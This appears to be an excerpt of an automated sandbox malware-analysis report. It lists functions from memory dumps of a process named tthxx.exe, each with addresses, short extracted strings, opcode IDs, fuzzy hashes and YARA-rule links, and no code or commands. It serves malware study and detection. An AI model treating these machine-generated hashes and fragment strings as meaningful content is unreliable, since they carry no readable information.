Source File: 00000004.00000002.2241066020.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b419eff00878e3708cdc4bef0e56049c491e9910f00fd4a30a739ad897c256f
Instruction ID: 70ed3b85a3c39cb90fa061f6ed01f70b376245526b069bf3335b6b70f1ff3a52
Opcode Fuzzy Hash: 8b419eff00878e3708cdc4bef0e56049c491e9910f00fd4a30a739ad897c256f
Instruction Fuzzy Hash: D82125B1504244DFDB15DF50F8C0B2ABF75FB88318F24C5A9E8094B246C336D866DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0014D10C, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2241401521.000000000014D000.00000040.00000001.sdmp, Offset: 0014D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c1c2467c1307cbed0207a0ad7234a6e0676d28e86ce1dad58786418a11bc285
Instruction ID: 87162f1f48638efaa73c2e02fc235e6d306b75b4e71609d786a650745924b623
Opcode Fuzzy Hash: 8c1c2467c1307cbed0207a0ad7234a6e0676d28e86ce1dad58786418a11bc285
Instruction Fuzzy Hash: CB210875604244DFDF14DF14E9C4B2ABBA5EB84B14F20C969EC054B351C33AD806C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 0012D55B, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2241066020.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b0af1fbb6bd47f68434911f3fe7363aada07d7eb1d42b09b4c58fc76535494c
Instruction ID: fc9d16a623ca4bf36e6ce8317ba88d3f1284b1e15e4faec7182eb0194972fd5a
Opcode Fuzzy Hash: 2b0af1fbb6bd47f68434911f3fe7363aada07d7eb1d42b09b4c58fc76535494c
Instruction Fuzzy Hash: C1119376504280DFCF16CF10E9C4B1ABF72FB94314F24C6A9D8094B656C33AD866CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0012D647, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2241066020.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b0af1fbb6bd47f68434911f3fe7363aada07d7eb1d42b09b4c58fc76535494c
Instruction ID: db06aef25145f67993ddbb84ff722eeff0c671e15daf2146e9c56630c5800f80
Opcode Fuzzy Hash: 2b0af1fbb6bd47f68434911f3fe7363aada07d7eb1d42b09b4c58fc76535494c
Instruction Fuzzy Hash: C611E676404280DFCF02CF10E9C4B16BF72FB94314F24C6A9D8094B656C33AD866CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0014D107, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2241401521.000000000014D000.00000040.00000001.sdmp, Offset: 0014D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c68857aaaab0787a5a57ea12b792e58378170e1969ac21c8957bac080429098
Instruction ID: 932d48c99eaf65c865481d185d0a6930ed51323335c417139c3df2d365460939
Opcode Fuzzy Hash: 2c68857aaaab0787a5a57ea12b792e58378170e1969ac21c8957bac080429098
Instruction Fuzzy Hash: 8211E075504284CFDB01CF14EAC4B1AFBA1FB84714F24C6AAD8494B752C33AD80ACB92

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001E5298, Relevance: 2.7, Strings: 2, Instructions: 238COMMON

Download Yara Rule

Strings

J-p, xrefs: 001E5387
,G-p, xrefs: 001E54E3

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: ,G-p$J-p
API String ID: 0-3905215198
Opcode ID: dd2d70ccd550d8b19a7b5eda7fc18584c93ae19817f0de3adb8a00f9d5ca2ba9
Instruction ID: ee142fb9e7cd89a98b03eb48ee3c5a97ec9d2dad0b5bdb470e1be95686616c76
Opcode Fuzzy Hash: dd2d70ccd550d8b19a7b5eda7fc18584c93ae19817f0de3adb8a00f9d5ca2ba9
Instruction Fuzzy Hash: 1B916E70E00A498FDF14CFAAC8817DDBBF3BF88358F148529E405A7294EB749885CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001EA330, Relevance: 2.7, Strings: 2, Instructions: 167COMMON

Download Yara Rule

Strings

, xrefs: 001EA473
hHM, xrefs: 001EA360

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: $hHM
API String ID: 0-1589281480
Opcode ID: 43fe07e18870a7130c963d9ccc72720e5e251c688245aea3d644bcee0d11093f
Instruction ID: 0e77696e762ed7aa36ce2cfdb271504b228962a6e7ea58ddbb717c1f6c27cc07
Opcode Fuzzy Hash: 43fe07e18870a7130c963d9ccc72720e5e251c688245aea3d644bcee0d11093f
Instruction Fuzzy Hash: E3511231F086894FCB11DBAAD8805AEBBB2EFC5300B1981BAD505D7786D774AD058B92

Uniqueness

Uniqueness Score: -1.00%

Function 001E9F90, Relevance: 1.5, Strings: 1, Instructions: 258COMMON

Download Yara Rule

Strings

t>m, xrefs: 001EA04E

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: t>m
API String ID: 0-174180194
Opcode ID: d38509093d934b567f56875d0810844080813ecb87e6b6ecf991fa08ccd6d192
Instruction ID: 991778f9dbc70064963278bb4ce7212e85a110df145bca15c442c2c2f114479f
Opcode Fuzzy Hash: d38509093d934b567f56875d0810844080813ecb87e6b6ecf991fa08ccd6d192
Instruction Fuzzy Hash: AD918071F105598BC704EB6AE890A6EB3B3AFD4754F1AC135E4099B399DF35AC01CB81

Uniqueness

Uniqueness Score: -1.00%

Function 001EBF00, Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

@2>m, xrefs: 001EC115

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: @2>m
API String ID: 0-4017729607
Opcode ID: 3efaf782bfd8fe5d32a35237963f4935d8476570537386eb37a9d92b530a0c5d
Instruction ID: d24948c5063e118e45ea6a751a2aeece7cf5f2ef8507b8a26c7e34633f187c7d
Opcode Fuzzy Hash: 3efaf782bfd8fe5d32a35237963f4935d8476570537386eb37a9d92b530a0c5d
Instruction Fuzzy Hash: 3B613D74902618CFD748EFAAE84568ABBF3AF88304F04C93AE1149B328EB7459559F44

Uniqueness

Uniqueness Score: -1.00%

Function 001E6E30, Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

@2>m, xrefs: 001E700E

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: @2>m
API String ID: 0-4017729607
Opcode ID: a0ed60acabba988126e73dc8bb33d1a274c475677f96ceb6dc27a2347e06f945
Instruction ID: c485f8c201c4ee64ebee1fb1b38967bd66ee02d35a85c7f74b1647d49ce7e3f1
Opcode Fuzzy Hash: a0ed60acabba988126e73dc8bb33d1a274c475677f96ceb6dc27a2347e06f945
Instruction Fuzzy Hash: 5551B374A0064A8BD708EFBBF95468ABBF3ABDA304F04C939D0189B638DF7405458F50

Uniqueness

Uniqueness Score: -1.00%

Function 001EA07C, Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cc6921aa25dc82f56682e7d1f99a5ac47f7cdde03031274b056a8cab24e58fe
Instruction ID: 1733ec83505a6ce80d4e5b47e8ea213057512a79b6def115f0933c09a340aa82
Opcode Fuzzy Hash: 7cc6921aa25dc82f56682e7d1f99a5ac47f7cdde03031274b056a8cab24e58fe
Instruction Fuzzy Hash: 71618D32F105658BC704EB6ADC90A6EB3A3AFD4714F2AC175E409AB399DF35AC01C780

Uniqueness

Uniqueness Score: -1.00%

Function 001E2099, Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd3719596cd64ea63834c4c76c80e84ac4ede1e08c690775bc578836c5a9e913
Instruction ID: bf9558e4cf263cf2acd4331a4378facf80595d40a37f4e70f4278621a2949c83
Opcode Fuzzy Hash: bd3719596cd64ea63834c4c76c80e84ac4ede1e08c690775bc578836c5a9e913
Instruction Fuzzy Hash: EE518031F085858FCB14DBAA8CA04AEBBB7EBC631473A85B7C216CB642C735DD068741

Uniqueness

Uniqueness Score: -1.00%

Function 001ED334, Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 056f8eacd75cd971df21bb0aa15280f60a4c2cbfcbfb596d14bb1386dfbc9167
Instruction ID: 676d8ca0308ca5ca075f4c066b888cd9ab9dfa0570a16f433b17a97ee7103642
Opcode Fuzzy Hash: 056f8eacd75cd971df21bb0aa15280f60a4c2cbfcbfb596d14bb1386dfbc9167
Instruction Fuzzy Hash: 952107B4D09A98CFCB18DF66D4847ACB7B5BF4A300F2191AAD50AAB361D7309C81DF00

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: tthxx.exe PID: 2880 Parent PID: 2452 tthxx.exeCOMMON

Executed Functions

Function 002E8B80, Relevance: 5.8, Strings: 4, Instructions: 810COMMON

Download Yara Rule

Strings

48>m, xrefs: 002E8C38
H8Z, xrefs: 002E8E07
48>m, xrefs: 002E9675
$>Z, xrefs: 002E97C1

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: $>Z$48>m$48>m$H8Z
API String ID: 0-610025858
Opcode ID: 49a27a6d95cb4d64a191831513efc3d8346217feba097580944fff5b6168cda9
Instruction ID: b4a43b2219fb20f121e58846aaf9f3ebc2e93d4ce954205dbec84b678504b622
Opcode Fuzzy Hash: 49a27a6d95cb4d64a191831513efc3d8346217feba097580944fff5b6168cda9
Instruction Fuzzy Hash: D572DE74E252698FCB14DF69D8806ADB7F2FF89300F55C56AE406AB344DB349A85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 002E7098, Relevance: 3.2, Strings: 2, Instructions: 670COMMON

Download Yara Rule

Strings

TV>m, xrefs: 002E73D8
TV>m, xrefs: 002E7121

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: TV>m$TV>m
API String ID: 0-2081520053
Opcode ID: 91c58335b56fcc0759efa9d935054ff3290522e516c32861fa65c5dc577f519e
Instruction ID: fa05a26f840ff2ce940f3d1cbfa6171a1cc538034a25e626d4ff4e2ec4b318e8
Opcode Fuzzy Hash: 91c58335b56fcc0759efa9d935054ff3290522e516c32861fa65c5dc577f519e
Instruction Fuzzy Hash: 2F524635A10514DFCB09DFA9C984E98BBB2FF89304F5685A8E50A9B272CB31EC51DF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E55E0, Relevance: 2.8, Strings: 2, Instructions: 281COMMON

Download Yara Rule

Strings

,G-p, xrefs: 002E5897
J-p, xrefs: 002E5738

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: ,G-p$J-p
API String ID: 0-3905215198
Opcode ID: 48472ff26f5197929bebc37ee5d16263de332e5a8603653f9b67d709578c3210
Instruction ID: f2ccfac09680b978d7014ede680da7ef0cfdb75c59839a6caa18a489486d06aa
Opcode Fuzzy Hash: 48472ff26f5197929bebc37ee5d16263de332e5a8603653f9b67d709578c3210
Instruction Fuzzy Hash: BBB19F70E60659CFDF10CFAAC8857DEBBF2AF88318F548529D805E7250EB749891CB91

Uniqueness

Uniqueness Score: -1.00%

Function 002E8BCA, Relevance: 2.8, Strings: 2, Instructions: 276COMMON

Download Yara Rule

Strings

48>m, xrefs: 002E8C38
H8Z, xrefs: 002E8E07

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: 48>m$H8Z
API String ID: 0-1828936954
Opcode ID: f5a2ef8b4078c347529c27309010f7d0ca790543d3a0dcab7513c4913d05c9d7
Instruction ID: 23f469a2ae2d99d0a09e6ef88560933a886cf89619425b9e6a9be869d1423a12
Opcode Fuzzy Hash: f5a2ef8b4078c347529c27309010f7d0ca790543d3a0dcab7513c4913d05c9d7
Instruction Fuzzy Hash: A0B1AA35A152299FDB04DF6AEC84AADB7B3FFC9305F15C129E406A7358CB306A45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 002E0CA5, Relevance: 1.6, Strings: 1, Instructions: 321COMMON

Download Yara Rule

Strings

(F>m, xrefs: 002E0E7C

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: (F>m
API String ID: 0-1108586279
Opcode ID: 9c6f6fe4a870d27ca353cd0cd232aa5a97292db2d91f5a9be3245fd1278f036d
Instruction ID: d7e3f702487304487cb16842c0ae4775a4ff8dc6b83b3aaf4a4b5ecf441a322a
Opcode Fuzzy Hash: 9c6f6fe4a870d27ca353cd0cd232aa5a97292db2d91f5a9be3245fd1278f036d
Instruction Fuzzy Hash: D2D14E74A5021A8FDB14CF7AD894AADB7F2FF88304F558569E009EB354DB349D82CB50

Uniqueness

Uniqueness Score: -1.00%

Function 002E5EB0, Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

J-p, xrefs: 002E6149

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: J-p
API String ID: 0-645735091
Opcode ID: fe19a01dfc665064cfd91d6a112d6f1aab81a4bb5efd16fe1bc8d861cce686c9
Instruction ID: 5230c084d1788a12d308967b643534ca1ff88b4390cefe05bf63dc6f82eede37
Opcode Fuzzy Hash: fe19a01dfc665064cfd91d6a112d6f1aab81a4bb5efd16fe1bc8d861cce686c9
Instruction Fuzzy Hash: C5B19E70E502598FDF10CFAAC88579EBBF2BF98354F548529E408EB354EB749891CB81

Uniqueness

Uniqueness Score: -1.00%

Function 002E07C8, Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

(F>m, xrefs: 002E09C8

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: (F>m
API String ID: 0-1108586279
Opcode ID: 52ef3272c0b493b09f8cc0b141fec5098636f3a6a551d839acfbf2e6c20d7fd0
Instruction ID: 6679255e3a2ac10e648cae2c1260f9c1c8af7f84b6818b70a61011d4a179b373
Opcode Fuzzy Hash: 52ef3272c0b493b09f8cc0b141fec5098636f3a6a551d839acfbf2e6c20d7fd0
Instruction Fuzzy Hash: CC9119B8E5024EDFDF10CFA6D5849AEB7B1FF48304F50A925D402EB255DB71A982CB50

Uniqueness

Uniqueness Score: -1.00%

Function 002E1D78, Relevance: 1.5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

t>m, xrefs: 002E1E00

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: t>m
API String ID: 0-174180194
Opcode ID: d5d7ad98c50732f6ad157c4b22c3661daea153a177ab46f4dc71181584b10532
Instruction ID: 7fbf7f1ac0d4147fd6573642e67ba1e4bff491e75a085b4dde3a293af14956ec
Opcode Fuzzy Hash: d5d7ad98c50732f6ad157c4b22c3661daea153a177ab46f4dc71181584b10532
Instruction Fuzzy Hash: 0581AE32F641558FC714DB6AC880AAEB3E7AFC8354F6A8474E4069B395DB70AC51CB80

Uniqueness

Uniqueness Score: -1.00%

Function 002E1E2A, Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 879883c9202fcb62f559993c8e5294a954eeac512571892abb557843b86ccfa4
Instruction ID: a3863f5d0357d7fb1445aa43db7e6a6814230598b947a24e0bee847430382b82
Opcode Fuzzy Hash: 879883c9202fcb62f559993c8e5294a954eeac512571892abb557843b86ccfa4
Instruction Fuzzy Hash: 88618B32F601258FD754DB69CC80B9EB3A3AFC8754F1AC174E4199B3A9DA71AC51CB80

Uniqueness

Uniqueness Score: -1.00%

Function 002E7EA2, Relevance: 3.9, Strings: 3, Instructions: 198COMMON

Download Yara Rule

Strings

`!>m, xrefs: 002E7F76
x@Z, xrefs: 002E7E50
`!>m, xrefs: 002E7F6A

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: `!>m$`!>m$x@Z
API String ID: 0-3951920866
Opcode ID: 26caf64fe93abee43dd78bf2404add904a345ceb53a513dd6bb6943fee49d959
Instruction ID: f727e0f9ffa7daa79d10c7154004a8e65921e5a760aebabe11a35d18ca083607
Opcode Fuzzy Hash: 26caf64fe93abee43dd78bf2404add904a345ceb53a513dd6bb6943fee49d959
Instruction Fuzzy Hash: 88718034B141089FCB04EFA9E985AAEB7F6FB89310F148029E90AE7354DB309D51DF91

Uniqueness

Uniqueness Score: -1.00%

Function 002E55D6, Relevance: 2.8, Strings: 2, Instructions: 277COMMON

Download Yara Rule

Strings

,G-p, xrefs: 002E5897
J-p, xrefs: 002E5738

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: ,G-p$J-p
API String ID: 0-3905215198
Opcode ID: f98ceff0aabb1910fd87608dfb2ace44a1607fe166594b7f79105dfecbc8ec3e
Instruction ID: f1ff22892dcf1c679e98aec0ef3537d8366e5a5ed4b7ea76eac6cdafd224b7be
Opcode Fuzzy Hash: f98ceff0aabb1910fd87608dfb2ace44a1607fe166594b7f79105dfecbc8ec3e
Instruction Fuzzy Hash: CEB19D70E60669CFDB10CFAAC8857DEBBF2AF48318F548529D805E7290DB749891CF91

Uniqueness

Uniqueness Score: -1.00%

Function 002E5C1C, Relevance: 2.7, Strings: 2, Instructions: 181COMMON

Download Yara Rule

Strings

,G-p, xrefs: 002E5C97
,G-p, xrefs: 002E5DEA

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: ,G-p$,G-p
API String ID: 0-3749958308
Opcode ID: f0965308e69b871d747a18c243bd0095c10539638ee4d7cd8e83f5193a5f454e
Instruction ID: 95be7a10af56378eaf99acd5834bd03308188a24c89503c88f70ac29b16ee6d2
Opcode Fuzzy Hash: f0965308e69b871d747a18c243bd0095c10539638ee4d7cd8e83f5193a5f454e
Instruction Fuzzy Hash: 2C717A70E60659CFDB10CFAAC8847DEBBF2BF88308F148529E815AB254D7749851CF91

Uniqueness

Uniqueness Score: -1.00%

Function 002E5C28, Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

,G-p, xrefs: 002E5C97
,G-p, xrefs: 002E5DEA

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: ,G-p$,G-p
API String ID: 0-3749958308
Opcode ID: d00ec65f8ef26c72f3775d34c041bcf9de28ae4cf3fc348e547cf5eee17e6eea
Instruction ID: 9cc497da7ea60ff0043535b477b00b5631f1a826880b666ef8d1e26e2b0cbcc7
Opcode Fuzzy Hash: d00ec65f8ef26c72f3775d34c041bcf9de28ae4cf3fc348e547cf5eee17e6eea
Instruction Fuzzy Hash: DE717970E60659CFDF14CFAAC8847DEBBF2BF88308F648429E415AB254DB749851CB91

Uniqueness

Uniqueness Score: -1.00%

Function 002E9B60, Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

hHZ, xrefs: 002E9B7C
, xrefs: 002E9CA9

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: $hHZ
API String ID: 0-3714647823
Opcode ID: ee9a10342c901086c145f374faf45f90af05d919d5fad9cf425d8f2b210bf4da
Instruction ID: 87fee68db0b1c34000486a7f87b777cd3d61815d36925e4612bd7fd68589a159
Opcode Fuzzy Hash: ee9a10342c901086c145f374faf45f90af05d919d5fad9cf425d8f2b210bf4da
Instruction Fuzzy Hash: DB51EA71F1410A8BCB00EF9AD8805AEFBB6FB89310B60C52BD515D7705D730A9A5CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 002E5EA4, Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

J-p, xrefs: 002E6149

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: J-p
API String ID: 0-645735091
Opcode ID: cbb17ffbc689d673c17512f8ea1e4447c6f28d1df96e5def8fe11d0101e0d765
Instruction ID: fb9c952f5b61cc549594ad1c9d1f2f0e4089779c25b2239186706c58ccf4ca8e
Opcode Fuzzy Hash: cbb17ffbc689d673c17512f8ea1e4447c6f28d1df96e5def8fe11d0101e0d765
Instruction Fuzzy Hash: FEB1AE70E60259CFDB10CFAAC8857DEBBF1BF58354F548529E408EB254DB749891CB81

Uniqueness

Uniqueness Score: -1.00%

Function 002E07B9, Relevance: 1.4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

(F>m, xrefs: 002E09C8

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: (F>m
API String ID: 0-1108586279
Opcode ID: 93f866040b7c2f8f557527b501d6b7f214d0bcc42bbc3d6b08ce928b1f7e3a1d
Instruction ID: 7437caf4745e6a16b2c4327bbf4d02bd59f36d3d665b4f93087f1ecca7dc95ee
Opcode Fuzzy Hash: 93f866040b7c2f8f557527b501d6b7f214d0bcc42bbc3d6b08ce928b1f7e3a1d
Instruction Fuzzy Hash: 30514EB8D5024E9FDF00CFA6D8846ADBBB1FF88304F109925D002EB355DB719986CB51

Uniqueness

Uniqueness Score: -1.00%

Function 002ECD20, Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

48>m, xrefs: 002ECE2D

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: 48>m
API String ID: 0-112394842
Opcode ID: 54e02dad003a78609c335f0877ae4b730070e9e1e196b5c2598fab507bae86a2
Instruction ID: 2485a0387897cf3491aa545782a4b2594d761061f1a3dfc54e6dc08c8bc90ff6
Opcode Fuzzy Hash: 54e02dad003a78609c335f0877ae4b730070e9e1e196b5c2598fab507bae86a2
Instruction Fuzzy Hash: EC51E274D69258CFCB14CFEAD884AEDBBF6BF49300F649129D409AB255DB709846CB40

Uniqueness

Uniqueness Score: -1.00%

Function 002E1B20, Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

, xrefs: 002E1C40

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 843c34cfbe5214f7e3fe7c8f305d7a938d415a1d83bf6dfe5e86c88242be9955
Instruction ID: dbe0dd99b825b79a1002212868af77bb7769bcd045cf1acd9678ab3db9a4438e
Opcode Fuzzy Hash: 843c34cfbe5214f7e3fe7c8f305d7a938d415a1d83bf6dfe5e86c88242be9955
Instruction Fuzzy Hash: CC411535BA81498FCB10DFA6D8800AEB7A6EFC1318B75C47BC515DB611E37198728752

Uniqueness

Uniqueness Score: -1.00%

Function 002EC328, Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

LC?m, xrefs: 002EC3BB

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: LC?m
API String ID: 0-3917954265
Opcode ID: 2292e77cb0eb532d5923fd5618bf0147339e845f1dd632b30a2b0f16ea4e5b0c
Instruction ID: cea93c8d346e7f4c47582a871186636e20207874d54a1ac94909651ac888d309
Opcode Fuzzy Hash: 2292e77cb0eb532d5923fd5618bf0147339e845f1dd632b30a2b0f16ea4e5b0c
Instruction Fuzzy Hash: 3041E3308BD2C9CACB00DBF6D890BF97BADB75A304FB49855C005972A6D7B4541AAB41

Uniqueness

Uniqueness Score: -1.00%

Function 002E5D28, Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

,G-p, xrefs: 002E5DEA

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: ,G-p
API String ID: 0-3462037260
Opcode ID: fa51614446b0be99bb24e871e8a7f84cd5b8dd8b98408c501fa962e72e3dc894
Instruction ID: 6f06ce6ac4f5007db859a978b56637a4e2366003f37564e09a03366fe6fcf8af
Opcode Fuzzy Hash: fa51614446b0be99bb24e871e8a7f84cd5b8dd8b98408c501fa962e72e3dc894
Instruction Fuzzy Hash: 55419C30D64299CFCF24DFA5C894BEDBBB2BF0830CF588429D001AB290DB7448A5CB91

Uniqueness

Uniqueness Score: -1.00%

Function 002E81D0, Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

\-yl, xrefs: 002E8214

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: \-yl
API String ID: 0-720590201
Opcode ID: 915190a1386dfc8403e6005bd1f964400abb768229a203d3839092b6a1da9a9d
Instruction ID: 5aa20f01d50953142c6bf29e50986645734cf2c346e2f314b054b70aea4bd4ca
Opcode Fuzzy Hash: 915190a1386dfc8403e6005bd1f964400abb768229a203d3839092b6a1da9a9d
Instruction Fuzzy Hash: 6C31E930B101599BC704AFA9CC557AFB7E7AFCA714F248028E616AB388CF709D059F95

Uniqueness

Uniqueness Score: -1.00%

Function 002E6291, Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

\-yl, xrefs: 002E6356

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: \-yl
API String ID: 0-720590201
Opcode ID: 949bbb30407f3e2714b826c5b8f49767711bd613a092e04498e2f8f9adb585e0
Instruction ID: e46869c8bd68fa88649d9bf2f79a5cc1d5127890256d4a2a6659851b9e861ba8
Opcode Fuzzy Hash: 949bbb30407f3e2714b826c5b8f49767711bd613a092e04498e2f8f9adb585e0
Instruction Fuzzy Hash: B331C535B541588FCB08AF7AC8645BEB6E75FDA644B16407AD106DB3A0CF708C028B92

Uniqueness

Uniqueness Score: -1.00%

Function 002E6840, Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

;2, xrefs: 002E6889

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: ;2
API String ID: 0-273951268
Opcode ID: 8e33f5127af6a448ce208563da2fd3ecd88aa051ec77fdfc1118adcc9f10095a
Instruction ID: ecaa43c9a78cfa451bacbfe135d8646cec9165009fbd2bebb5ad020eaae0abbc
Opcode Fuzzy Hash: 8e33f5127af6a448ce208563da2fd3ecd88aa051ec77fdfc1118adcc9f10095a
Instruction Fuzzy Hash: 443137303642818FCB00DB3AD8988297BE6AF9679036545AAE006CF372DB71DC19CB52

Uniqueness

Uniqueness Score: -1.00%

Function 002EAE60, Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

LQZ, xrefs: 002EAEA2

Memory Dump Source

Source File: 00000008.00000002.2242132232.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: LQZ
API String ID: 0-2933881161
Opcode ID: 68cacb452ac7cfe88a1f7358d62c12a0be305f3d860cf3038b2bee47cc94064a
Instruction ID: 67888431173176f30d912b795b1648746dbc81dbb967b2bbc87360ed1e31825c
Opcode Fuzzy Hash: 68cacb452ac7cfe88a1f7358d62c12a0be305f3d860cf3038b2bee47cc94064a
Instruction Fuzzy Hash: A0313E70610B458FCB74DF2AD88865AB7F2BF847117248A2DD4AEC3A90E731F851CB41

Uniqueness

Uniqueness Score: -1.00%

